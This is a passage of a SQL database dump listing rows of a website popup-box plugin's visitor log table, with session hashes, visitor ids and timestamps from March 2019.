(67903, 'a9f7fd3003d9ca427806e39222122225', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-06 19:53:31'),
(67904, '36c2a4f28152d1920b14491ce849079d', 'dace6e0c219330fc', 0, 2, 1, '2019-03-06 19:53:36'),
(67905, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:53:38'),
(67906, '8c3e1b06f04fbc68c0a56d90afc89b8f', '913c1d6747e8d02e', 0, 2, 1, '2019-03-06 19:53:43'),
(67907, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 19:53:48'),
(67908, '6dcbfee6894b9e41f254480de57bb22e', '332723ec6654d9f5', 0, 2, 1, '2019-03-06 19:54:02'),
(67909, '2a5df0a9178ef64b2c325cfade0d1ea9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-06 19:54:06'),
(67910, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 19:54:06'),
(67911, '7656accf2d66e8f8a20fe1899e3db484', '324d0c5c1f480926', 0, 2, 1, '2019-03-06 19:54:11'),
(67912, '08bc6aa1720ae5e18acef1a753fc2635', '0530018377078939', 0, 2, 1, '2019-03-06 19:54:12'),
(67913, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-06 19:54:35'),
(67914, '36c2a4f28152d1920b14491ce849079d', 'dace6e0c219330fc', 0, 2, 1, '2019-03-06 19:54:36'),
(67915, '6dcbfee6894b9e41f254480de57bb22e', '332723ec6654d9f5', 0, 2, 1, '2019-03-06 19:54:43'),
(67916, 'a9f7fd3003d9ca427806e39222122225', 'b53c70bea01d2d6e', 0, 2, 1, '2019-03-06 19:54:44'),
(67917, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 19:54:44'),
(67918, '36c2a4f28152d1920b14491ce849079d', 'dace6e0c219330fc', 0, 2, 1, '2019-03-06 19:54:48'),
(67919, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:54:49'),
(67920, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 19:54:52'),
(67921, '4cf81afa29186bb59008480cf102e4e7', '1c68b977b911188c', 0, 2, 1, '2019-03-06 19:54:53'),
(67922, '2a5df0a9178ef64b2c325cfade0d1ea9', 'f7a6478e84d2bd7e', 0, 2, 1, '2019-03-06 19:55:01'),
(67923, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 19:55:07'),
(67924, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:55:08'),
(67925, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 19:55:12'),
(67926, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 19:55:25'),
(67927, 'eab24e6bff822424efea17a9a88ffec6', 'df27b9a2919a8206', 0, 2, 1, '2019-03-06 19:55:33'),
(67928, '310e0683ea4ded374e61d12905ae1e17', '1de090ec808c88cc', 0, 2, 1, '2019-03-06 19:55:35'),
(67929, 'eab24e6bff822424efea17a9a88ffec6', 'df27b9a2919a8206', 0, 2, 1, '2019-03-06 19:55:43'),
(67930, '07bd46765aee1942e5289d7e3317cb7e', 'a639f655bef0fc87', 0, 2, 1, '2019-03-06 19:55:59'),
(67931, '5a5d8d04ef9c5bdf121648c34176f8b3', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-06 19:56:09'),
(67932, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:57:04'),
(67933, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 19:57:04'),
(67934, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:57:09'),
(67935, '00f944ec44060d1f2322aed3e16ad071', 'cad202a09758cb3a', 0, 2, 1, '2019-03-06 19:57:11'),
(67936, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 19:57:15'),
(67937, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:57:24'),
(67938, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:57:36'),
(67939, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-06 19:57:50'),
(67940, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:59:21'),
(67941, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-03-06 19:59:36'),
(67942, 'f2b4d03c00b1cb4920a85dbc4661df4c', '5e079f4a56e7324d', 0, 2, 1, '2019-03-06 20:00:47'),
(67943, '976cbd37ac32782cd855e5b249502cea', 'a83e11812aff7ff7', 0, 2, 1, '2019-03-06 20:07:51'),
(67944, '68e37055779a48fd3d39ed3c83391d99', '7fb70215b727bf46', 0, 2, 1, '2019-03-06 20:08:56'),
(67945, '080e0c3afbbf311cea73ac0b19618215', 'edfe950d47379572', 0, 2, 1, '2019-03-06 20:10:31'),
(67946, '07bd46765aee1942e5289d7e3317cb7e', 'a639f655bef0fc87', 0, 2, 1, '2019-03-06 20:11:34'),
(67947, 'f54482240db0208e8646a43d9c8f1b04', '2b9b3dbff167b95d', 0, 2, 1, '2019-03-06 20:12:41'),
(67948, '4490a14b1afd52be4b7f315a3861f331', '4574603cf07e6399', 0, 2, 1, '2019-03-06 20:21:20'),
(67949, 'c79b17ccf3d4543a1f99a473973bfd33', 'c123e74a1d22036a', 0, 2, 1, '2019-03-06 20:31:22'),
(67950, '13221e199dbe6f988afab6e264bd0f12', '21745be3642b6438', 0, 2, 1, '2019-03-06 20:32:05'),
(67951, '67e5294ee7b1ad6dc83283dca8edf266', '68d6262f427661c5', 0, 2, 1, '2019-03-06 20:45:05'),
(67952, 'd96d9924783e40f51e5830889e50b402', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 20:49:48');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(67953, 'd96d9924783e40f51e5830889e50b402', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-06 20:53:00'),
(67954, '81158f2353e3443b25fed37a259e8bec', 'daf3728a7b2bad96', 0, 2, 1, '2019-03-06 20:59:02'),
(67955, '1a004019ebecddd923096a4c851b24c5', '52c59de43437a9a0', 0, 2, 1, '2019-03-06 21:03:44'),
(67956, 'd8230cea3582a3815453def2f26a40c3', '37dedc117a94d375', 0, 2, 1, '2019-03-06 21:38:18'),
(67957, 'c5e5da456fcb44fa5e9fae41b2403191', 'c82195f7827b9487', 0, 2, 1, '2019-03-06 21:47:46'),
(67958, 'd3048208569e6c40f591df3bb6595875', '9f1bc05a9fe3a88d', 0, 2, 1, '2019-03-06 22:36:33'),
(67959, 'b4cae2fd524cf2a4660b6b056bc9c3b0', '788b24d6f845136c', 0, 2, 1, '2019-03-06 23:08:16'),
(67960, '942e1d56fce459245276dc7703d65560', '352cab308458526a', 0, 2, 1, '2019-03-07 00:12:44'),
(67961, '9262fad09ea345fdc19078e49196d448', '4deefbf93648fbcf', 0, 2, 1, '2019-03-07 00:14:10'),
(67962, '9262fad09ea345fdc19078e49196d448', '4deefbf93648fbcf', 0, 2, 1, '2019-03-07 00:16:45'),
(67963, '9262fad09ea345fdc19078e49196d448', '4deefbf93648fbcf', 0, 2, 1, '2019-03-07 00:20:44'),
(67964, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:42:56'),
(67965, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:43:36'),
(67966, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:45:38'),
(67967, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:46:19'),
(67968, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:47:25'),
(67969, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:50:32'),
(67970, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:50:51'),
(67971, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:51:18'),
(67972, '2738004e9a8c95520f8ca4eddc7917a3', '09a57a09c3ef84a1', 0, 2, 1, '2019-03-07 00:51:35'),
(67973, '88d82a1f4665f7ba0c13795337eaac20', '960d12b6c14f65ca', 0, 2, 1, '2019-03-07 01:09:15'),
(67974, '43bc9552160dee696957d5e8dda83ca1', 'f139a703a322243d', 0, 2, 1, '2019-03-07 01:12:27'),
(67975, '9fde4bbd17dd64a1faf1771b5a7c9edb', '599df9e8cc5ba141', 0, 2, 1, '2019-03-07 01:18:12'),
(67976, 'c2d316259f2f2229180fba69df7de0c3', '34b24f1206c1baef', 0, 2, 1, '2019-03-07 01:42:32'),
(67977, 'c2d316259f2f2229180fba69df7de0c3', '34b24f1206c1baef', 0, 2, 1, '2019-03-07 01:49:17'),
(67978, 'c2d316259f2f2229180fba69df7de0c3', '34b24f1206c1baef', 0, 2, 1, '2019-03-07 01:49:27'),
(67979, 'c2d316259f2f2229180fba69df7de0c3', '34b24f1206c1baef', 0, 2, 1, '2019-03-07 01:58:24'),
(67980, 'c2d316259f2f2229180fba69df7de0c3', '34b24f1206c1baef', 0, 2, 1, '2019-03-07 01:59:33'),
(67981, 'c2d316259f2f2229180fba69df7de0c3', '34b24f1206c1baef', 0, 2, 1, '2019-03-07 02:04:12'),
(67982, '08bc6aa1720ae5e18acef1a753fc2635', '0530018377078939', 0, 2, 1, '2019-03-07 02:12:37'),
(67983, '918a76d2d0d07dad396fd986f658386f', '05cd55385aec2424', 0, 2, 1, '2019-03-07 02:31:33'),
(67984, '76a8b2ff4f424691b6f4f85a73af0032', 'e2bb5f47cc92fbf4', 0, 2, 1, '2019-03-07 02:50:10'),
(67985, '55b25a5fb1f67b022d999dd4562cf9ca', '73eab94216af7a72', 0, 2, 1, '2019-03-07 02:59:41'),
(67986, '0b195a0b3804d92c4b34f73b5bf9ec05', 'be8ba3c319c4a348', 0, 2, 1, '2019-03-07 04:08:39'),
(67987, 'd96d9924783e40f51e5830889e50b402', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-07 04:08:50'),
(67988, '17af475b9b345adb13312b166d69ad40', 'cb7a96b2c9bd9d7e', 0, 2, 1, '2019-03-07 04:09:30'),
(67989, '2f0b6ba7d2d410ef4c260053494e5169', '0126f5e8f14d2471', 0, 2, 1, '2019-03-07 04:39:54'),
(67990, '2f0b6ba7d2d410ef4c260053494e5169', '0126f5e8f14d2471', 0, 2, 1, '2019-03-07 04:42:01'),
(67991, 'abb82f8925c3bebc4cc3306e3f139915', '65bae380b109f550', 0, 2, 1, '2019-03-07 04:48:38'),
(67992, 'ceb53fd02df28bccd758e5e0a108c7cf', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-07 05:36:26'),
(67993, 'ceb53fd02df28bccd758e5e0a108c7cf', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-07 05:36:58'),
(67994, '1aaeeb589d504f6cbf1093012ded0431', '21a75882f832ae93', 0, 2, 1, '2019-03-07 05:42:00'),
(67995, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-07 05:45:14'),
(67996, '05162b6a3754e26bb4e3832265a44e6f', 'e9a1dae89c492adf', 0, 2, 1, '2019-03-07 05:47:17'),
(67997, '99b1a94557a61580e5a21f4233473e25', 'ae8bb7a14512d265', 0, 2, 1, '2019-03-07 05:50:37'),
(67998, '99b1a94557a61580e5a21f4233473e25', 'ae8bb7a14512d265', 0, 2, 1, '2019-03-07 05:56:09'),
(67999, '99b1a94557a61580e5a21f4233473e25', 'ae8bb7a14512d265', 0, 2, 1, '2019-03-07 05:56:40'),
(68000, 'bd999cb5452e70b3e37bf4466dc5eba6', 'e7706165bb87a550', 0, 2, 1, '2019-03-07 06:09:59'),
(68001, 'fb6ccc28f2a2c74d288d35efefcdc495', 'b301d833ea94d585', 0, 2, 1, '2019-03-07 06:13:28'),
(68002, 'b1af8416b10799d660e850f7e610b23d', '4f7344ac919a413f', 0, 2, 1, '2019-03-07 06:20:59'),
(68003, 'ced5184c729d725f1eb163c85013e4e5', 'd9cd15e3c2ad1862', 0, 2, 1, '2019-03-07 06:26:25'),
(68004, '592df220e6f79fe8b5a9bb5891fa3ae7', 'c8d10f6deb7afb6d', 0, 2, 1, '2019-03-07 06:30:46'),
(68005, '592df220e6f79fe8b5a9bb5891fa3ae7', 'c8d10f6deb7afb6d', 0, 2, 1, '2019-03-07 06:30:56'),
(68006, '592df220e6f79fe8b5a9bb5891fa3ae7', 'c8d10f6deb7afb6d', 0, 2, 1, '2019-03-07 06:31:07'),
(68007, 'd0c2e3c9f3fc71e4e21b5ad043742d6e', '974fcf77608de4bd', 0, 2, 1, '2019-03-07 06:34:30'),
(68008, 'ec9300493e36475f8b002c4f2f784554', '9eb0844c337c3cda', 0, 2, 1, '2019-03-07 06:34:43'),
(68009, '99b8b9a3c169009e6fece9346dfc3770', 'dda2d2ad784aa998', 0, 2, 1, '2019-03-07 06:58:09'),
(68010, '99b8b9a3c169009e6fece9346dfc3770', 'dda2d2ad784aa998', 0, 2, 1, '2019-03-07 07:07:10'),
(68011, '99b8b9a3c169009e6fece9346dfc3770', 'dda2d2ad784aa998', 0, 2, 1, '2019-03-07 07:09:39'),
(68012, 'a742bcd438af26be28e061fe097facab', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-07 07:12:56'),
(68013, 'a742bcd438af26be28e061fe097facab', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-07 07:13:15'),
(68014, 'ccc46f7cd9caf97dd0c2fab5b2586ff0', '7857b93f6a5e2cae', 0, 2, 1, '2019-03-07 07:38:02'),
(68015, '50a9f657831c8a09e2c292182799e089', '9618c83b5427947b', 0, 2, 1, '2019-03-07 07:46:31'),
(68016, 'cdeac704351392f28b6430dbeb29dcef', '1760abd81c12ba57', 0, 2, 1, '2019-03-07 08:11:28'),
(68017, 'a7e3cdd4bd7d533de90978ef44190fc3', '61842a9285bc6bb2', 0, 2, 1, '2019-03-07 08:13:52'),
(68018, 'a7e3cdd4bd7d533de90978ef44190fc3', '61842a9285bc6bb2', 0, 2, 1, '2019-03-07 08:14:24'),
(68019, '92784b890d7a37474d904bb45207eef9', '1884d2fb51b69bb1', 0, 2, 1, '2019-03-07 08:42:44'),
(68020, '418d9bebcf7c6e2986e58317b2384df5', '57884e5fd0d535cb', 0, 2, 1, '2019-03-07 08:52:02'),
(68021, 'b085948118289c6354efc9f60e192112', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-07 08:52:23'),
(68022, '15028ea686918a250a44ccfb7e993f8e', '05cd55385aec2424', 0, 2, 1, '2019-03-07 09:03:09'),
(68023, '0426d75261143f42301939f07deb7d32', '7c5bcf99f2070582', 0, 2, 1, '2019-03-07 09:20:09'),
(68024, '354194b3bde58eb9bef5ee57ac9331c3', '6551472730717e35', 0, 2, 1, '2019-03-07 09:26:17'),
(68025, '9854570ce681c949d8b992dc56100a3b', 'b9b7bd45d7061bdf', 0, 2, 1, '2019-03-07 09:26:44'),
(68026, '9854570ce681c949d8b992dc56100a3b', 'b9b7bd45d7061bdf', 0, 2, 1, '2019-03-07 09:27:57'),
(68027, '9854570ce681c949d8b992dc56100a3b', 'b9b7bd45d7061bdf', 0, 2, 1, '2019-03-07 09:29:18'),
(68028, '0426d75261143f42301939f07deb7d32', '7c5bcf99f2070582', 0, 2, 1, '2019-03-07 09:32:46'),
(68029, '493a97b0eaf3e20cc2b80d486697b40b', '400d3f22f6782941', 0, 2, 1, '2019-03-07 09:51:31'),
(68030, '493a97b0eaf3e20cc2b80d486697b40b', '400d3f22f6782941', 0, 2, 1, '2019-03-07 09:57:36'),
(68031, 'c0e86e9bad4a36142cd7f9036bb10da8', 'a3b7aeba0710bcf4', 0, 2, 1, '2019-03-07 10:10:10'),
(68032, 'c0e86e9bad4a36142cd7f9036bb10da8', 'a3b7aeba0710bcf4', 0, 2, 1, '2019-03-07 10:10:49'),
(68033, '6344960e15772aaf54a7e0a3ac725cc3', '4859523ccae76b87', 0, 2, 1, '2019-03-07 10:24:41'),
(68034, 'b1e2583858d2d82caed4aa0873ef0636', '1d52f2d409137adb', 0, 2, 1, '2019-03-07 10:27:44'),
(68035, '9f39a30ef5d60b50855e70c1d18ba88f', '0778e704e592d4a1', 0, 2, 1, '2019-03-07 10:29:26'),
(68036, '9f39a30ef5d60b50855e70c1d18ba88f', '0778e704e592d4a1', 0, 2, 1, '2019-03-07 10:29:50'),
(68037, '0426d75261143f42301939f07deb7d32', '7c5bcf99f2070582', 0, 2, 1, '2019-03-07 10:30:35'),
(68038, '0426d75261143f42301939f07deb7d32', '7c5bcf99f2070582', 0, 2, 1, '2019-03-07 10:34:13'),
(68039, '6344960e15772aaf54a7e0a3ac725cc3', '4859523ccae76b87', 0, 2, 1, '2019-03-07 10:36:09'),
(68040, '6344960e15772aaf54a7e0a3ac725cc3', '4859523ccae76b87', 0, 2, 1, '2019-03-07 10:37:05'),
(68041, '6344960e15772aaf54a7e0a3ac725cc3', '4859523ccae76b87', 0, 2, 1, '2019-03-07 10:39:15'),
(68042, '6344960e15772aaf54a7e0a3ac725cc3', '4859523ccae76b87', 0, 2, 1, '2019-03-07 10:39:46'),
(68043, '0d7670b595612095d65c4431154fc589', 'c0e2af2c2f665ac5', 0, 2, 1, '2019-03-07 11:01:38'),
(68044, '400407ae0d91152d378b71253a2cbb9e', '5700e92b8bc806ea', 0, 2, 1, '2019-03-07 11:01:38'),
(68045, '0d7670b595612095d65c4431154fc589', 'c0e2af2c2f665ac5', 0, 2, 1, '2019-03-07 11:02:07'),
(68046, '0d7670b595612095d65c4431154fc589', 'c0e2af2c2f665ac5', 0, 2, 1, '2019-03-07 11:02:45'),
(68047, '6069284b7d65fec142972d723d915433', 'd2eba6c8be557978', 0, 2, 1, '2019-03-07 11:03:58'),
(68048, '6069284b7d65fec142972d723d915433', 'd2eba6c8be557978', 0, 2, 1, '2019-03-07 11:05:29'),
(68049, '6069284b7d65fec142972d723d915433', 'd2eba6c8be557978', 0, 2, 1, '2019-03-07 11:06:33'),
(68050, 'd2da40f43888f7d722cf294c302a2ac6', '6a38b106d21320c6', 0, 2, 1, '2019-03-07 11:31:20'),
(68051, '481445acdccbbd7f9c633397dc2f3c2f', 'b4b2fd212fec9a17', 0, 2, 1, '2019-03-07 11:32:50'),
(68052, 'd2da40f43888f7d722cf294c302a2ac6', '6a38b106d21320c6', 0, 2, 1, '2019-03-07 11:33:04'),
(68053, 'd2da40f43888f7d722cf294c302a2ac6', '6a38b106d21320c6', 0, 2, 1, '2019-03-07 11:33:36'),
(68054, '4e9c3eb5189e51e54e8b36aea9d21574', 'b2f4a1e6414ac742', 0, 2, 1, '2019-03-07 11:37:58'),
(68055, '4e9c3eb5189e51e54e8b36aea9d21574', 'b2f4a1e6414ac742', 0, 2, 1, '2019-03-07 11:38:10'),
(68056, '573dcf3501d39e3930ad28fa118c53db', 'e4f45e9062250cc6', 0, 2, 1, '2019-03-07 11:39:07'),
(68057, '5dc8142accb6333237a0eef392112906', '0e1b073b0eb09d49', 0, 2, 1, '2019-03-07 11:56:09'),
(68058, '5dc8142accb6333237a0eef392112906', '0e1b073b0eb09d49', 0, 2, 1, '2019-03-07 11:57:26'),
(68059, '5dc8142accb6333237a0eef392112906', '0e1b073b0eb09d49', 0, 2, 1, '2019-03-07 11:59:37'),
(68060, '5dc8142accb6333237a0eef392112906', '0e1b073b0eb09d49', 0, 2, 1, '2019-03-07 11:59:55'),
(68061, '5dc8142accb6333237a0eef392112906', '0e1b073b0eb09d49', 0, 2, 1, '2019-03-07 12:02:33'),
(68062, '5dc8142accb6333237a0eef392112906', '0e1b073b0eb09d49', 0, 2, 1, '2019-03-07 12:03:55'),
(68063, 'ee873bae85869f4603aae79a7eed2077', '330a028b8fe737cc', 0, 2, 1, '2019-03-07 12:10:51'),
(68064, 'ee873bae85869f4603aae79a7eed2077', '330a028b8fe737cc', 0, 2, 1, '2019-03-07 12:11:04'),
(68065, '47f9c8d8275e437a5f442972e9c9a908', '0bf16c319bd2f666', 0, 2, 1, '2019-03-07 12:21:25'),
(68066, '9bd1d5d68e9f2d922b2ce77fbc6dc202', '8999511a7a155e6a', 0, 2, 1, '2019-03-07 13:35:00'),
(68067, '8f8410799971739bde4753c16c90c612', '6568d3ed873abaf7', 0, 2, 1, '2019-03-07 15:02:58'),
(68068, '0221cbb918b33717112fff3702e676d4', '18b23021827aa348', 0, 2, 1, '2019-03-07 15:31:47'),
(68069, '80954544c129723ed419c999de9c83b7', 'ebd2c98f8ca8ef14', 0, 2, 1, '2019-03-07 16:09:57'),
(68070, 'a03dc3a066de86b34f846467c500f0fb', 'f35451633a143113', 0, 2, 1, '2019-03-07 16:23:54'),
(68071, '652ceb0c9c8aba6ea7879c781c5b2661', '08f45c3a2744e3ce', 0, 2, 1, '2019-03-07 16:26:51'),
(68072, '4057f537df4fc2a5bf1e9eaafbfa3830', '527bfb1a2c35f8aa', 0, 2, 1, '2019-03-07 17:05:28'),
(68073, 'f4a5744d7da13c0dea2250e0bb3227cc', '64b8038997aad0a4', 0, 2, 1, '2019-03-07 17:41:03'),
(68074, '48955bb64da546ee8cb9e38b8258ab92', '59b83de799a67e7f', 0, 2, 1, '2019-03-07 18:07:40'),
(68075, '48955bb64da546ee8cb9e38b8258ab92', '59b83de799a67e7f', 0, 2, 1, '2019-03-07 18:09:42'),
(68076, '48955bb64da546ee8cb9e38b8258ab92', '59b83de799a67e7f', 0, 2, 1, '2019-03-07 18:10:10'),
(68077, '48955bb64da546ee8cb9e38b8258ab92', '59b83de799a67e7f', 0, 2, 1, '2019-03-07 18:10:59'),
(68078, '48955bb64da546ee8cb9e38b8258ab92', '59b83de799a67e7f', 0, 2, 1, '2019-03-07 18:11:41'),
(68079, 'af0cfe71f2d05208e2d0fa04c19715e2', '111e975c0d9aac12', 0, 2, 1, '2019-03-07 19:18:58'),
(68080, '45f91f8bef21284d961c65ffc1184ebf', '4574603cf07e6399', 0, 2, 1, '2019-03-07 19:27:40'),
(68081, '5c6881e59da0057c0bb7c2db349551e8', '9c91f6a5fa373423', 0, 2, 1, '2019-03-07 19:33:10'),
(68082, 'ebe537d2df60b4133f0360a3129fed47', '2791f6f294d8894b', 0, 2, 1, '2019-03-07 19:50:10'),
(68083, 'cca22616a44204b2411a23652ca3e158', '91eb42cb0520de48', 0, 2, 1, '2019-03-07 20:06:29'),
(68084, 'eee0bb99cb0d3f2bdd594a59c546c31f', '1595741cda9bb897', 0, 2, 1, '2019-03-07 20:15:47'),
(68085, '0105ad5bb3415068058857d6f243be63', '2b9b3dbff167b95d', 0, 2, 1, '2019-03-07 20:16:09'),
(68086, 'd9f10b723d7add1dbfbc80c773bb2e42', 'c4d68ff585d0ed02', 0, 2, 1, '2019-03-07 21:37:02'),
(68087, 'd9f10b723d7add1dbfbc80c773bb2e42', 'c4d68ff585d0ed02', 0, 2, 1, '2019-03-07 21:38:29'),
(68088, 'd9f10b723d7add1dbfbc80c773bb2e42', 'c4d68ff585d0ed02', 0, 2, 1, '2019-03-07 21:38:41'),
(68089, 'd79128394636f27aa70cd2484fe44520', '6af8935f286d6491', 0, 2, 1, '2019-03-07 22:03:00'),
(68090, '888f43d6568b7af288b45e4302ada045', '664dd28daeae4cfb', 0, 2, 1, '2019-03-07 22:14:41'),
(68091, '03d860e35a8221e055c3a950f24a0306', '09efcb8d7bf145dc', 0, 2, 1, '2019-03-07 22:35:32'),
(68092, 'e5342b1da95d14f20da85588848083b9', '7e9ef5d8d581c561', 0, 2, 1, '2019-03-07 22:47:05'),
(68093, 'e5342b1da95d14f20da85588848083b9', '7e9ef5d8d581c561', 0, 2, 1, '2019-03-07 22:47:42'),
(68094, 'b06cae635df84e6cbea6d2bb19a5a20d', '2529a597d1c7a818', 0, 2, 1, '2019-03-07 22:50:17'),
(68095, 'e5342b1da95d14f20da85588848083b9', '7e9ef5d8d581c561', 0, 2, 1, '2019-03-07 22:50:44'),
(68096, 'e5342b1da95d14f20da85588848083b9', '7e9ef5d8d581c561', 0, 2, 1, '2019-03-07 22:51:18'),
(68097, 'e5342b1da95d14f20da85588848083b9', '7e9ef5d8d581c561', 0, 2, 1, '2019-03-07 22:51:35'),
(68098, '61fa023f233ed06f184e325e1829593e', '10530509166861d0', 0, 2, 1, '2019-03-07 22:51:53'),
(68099, '24037af4c5c2b3868e697e89530869a2', '4442cc4b9c648553', 0, 2, 1, '2019-03-07 23:58:59'),
(68100, '2dcac0e746b91e063ab0131b8fa613b5', '8d0ce8d2f494ec99', 0, 2, 1, '2019-03-08 00:16:02'),
(68101, '2dcac0e746b91e063ab0131b8fa613b5', '8d0ce8d2f494ec99', 0, 2, 1, '2019-03-08 00:16:46'),
(68102, '75a75cb4a82fa8b60291022c868dfb2a', '066c9df84027beb2', 0, 2, 1, '2019-03-08 00:44:02'),
(68103, '9a64b6c79408d3196f129c301aa88cae', 'ae8482347f283353', 0, 2, 1, '2019-03-08 00:44:02'),
(68104, '3b008443910259c2efff070114b83ac6', 'e338a39ca4d447b0', 0, 2, 1, '2019-03-08 00:45:32'),
(68105, '39abd0e356a1638714490c6914de9e62', '64c7a806d9c07b50', 0, 2, 1, '2019-03-08 00:48:56'),
(68106, '5611f6696f068b71337f1544d905d2a3', '33b047dddbc82829', 0, 2, 1, '2019-03-08 00:52:00'),
(68107, '72aeb97497939b163227a5350f297b85', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-08 02:07:10'),
(68108, '5947c4165ffe3626343863a834012c04', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-08 02:13:13'),
(68109, '8e0908c830bcbd162b422b925129e4ce', '412636120cfc615b', 0, 2, 1, '2019-03-08 02:49:35'),
(68110, 'e65d02b00ddb447028919c24475ce40c', 'ef79d04a161fdf7f', 0, 2, 1, '2019-03-08 02:49:35'),
(68111, '2bbe80bd357bfc6ba6844a2c22f89dff', '81ecdf6f28809114', 0, 2, 1, '2019-03-08 04:16:21'),
(68112, '2bbe80bd357bfc6ba6844a2c22f89dff', '81ecdf6f28809114', 0, 2, 1, '2019-03-08 04:16:53'),
(68113, '2bbe80bd357bfc6ba6844a2c22f89dff', '81ecdf6f28809114', 0, 2, 1, '2019-03-08 04:17:04'),
(68114, '2bbe80bd357bfc6ba6844a2c22f89dff', '81ecdf6f28809114', 0, 2, 1, '2019-03-08 04:17:15'),
(68115, '2bbe80bd357bfc6ba6844a2c22f89dff', '81ecdf6f28809114', 0, 2, 1, '2019-03-08 04:22:29'),
(68116, '2bbe80bd357bfc6ba6844a2c22f89dff', '81ecdf6f28809114', 0, 2, 1, '2019-03-08 04:25:57'),
(68117, 'bed916919e28bf931695df8c6e4162e6', 'e26fad46878c0a00', 0, 2, 1, '2019-03-08 04:31:39'),
(68118, '19f1f8815a9d5bba8c9c70caf01c5381', 'a5a539d82234fee4', 0, 2, 1, '2019-03-08 05:25:36'),
(68119, '2eca036ad3be5472905e8c834a23df97', '2fa458d0337a4355', 0, 2, 1, '2019-03-08 05:46:58'),
(68120, 'fd090aff93940ae50da1d489c4cfbd8d', '5fd8810cbf2b927b', 0, 2, 1, '2019-03-08 06:02:13'),
(68121, 'c3bc1351502baa3a3eddde53c06ce703', 'bace4d0a2bbef712', 0, 2, 1, '2019-03-08 06:10:53'),
(68122, 'c3bc1351502baa3a3eddde53c06ce703', 'bace4d0a2bbef712', 0, 2, 1, '2019-03-08 06:11:53'),
(68123, 'c3bc1351502baa3a3eddde53c06ce703', 'bace4d0a2bbef712', 0, 2, 1, '2019-03-08 06:13:56'),
(68124, 'c3bc1351502baa3a3eddde53c06ce703', 'bace4d0a2bbef712', 0, 2, 1, '2019-03-08 06:28:27'),
(68125, 'c3bc1351502baa3a3eddde53c06ce703', 'bace4d0a2bbef712', 0, 2, 1, '2019-03-08 06:29:38'),
(68126, '7851d045e93f580cb1a48ab7de37efa9', '8ad007cf09224cd8', 0, 2, 1, '2019-03-08 06:40:37'),
(68127, '7851d045e93f580cb1a48ab7de37efa9', '8ad007cf09224cd8', 0, 2, 1, '2019-03-08 06:40:49'),
(68128, 'b55751253bc5521b4e173bbbb84a6f1b', '7207845bf803b895', 0, 2, 1, '2019-03-08 07:04:13'),
(68129, '09513aafc49e648302cc5849aff54b24', '9d7e91466402b84a', 0, 2, 1, '2019-03-08 07:46:34'),
(68130, '61aa814f52823a6e742dddf46e2ce627', '09db5faadead3be4', 0, 2, 1, '2019-03-08 07:48:32'),
(68131, '4e92489ba1986b9dd5568d7536438d3d', '1791b1aeb2327e22', 0, 2, 1, '2019-03-08 07:58:29'),
(68132, '645326e4f7f286aa576fb0776de5c374', '5ad93093f53a3b65', 0, 2, 1, '2019-03-08 08:20:47'),
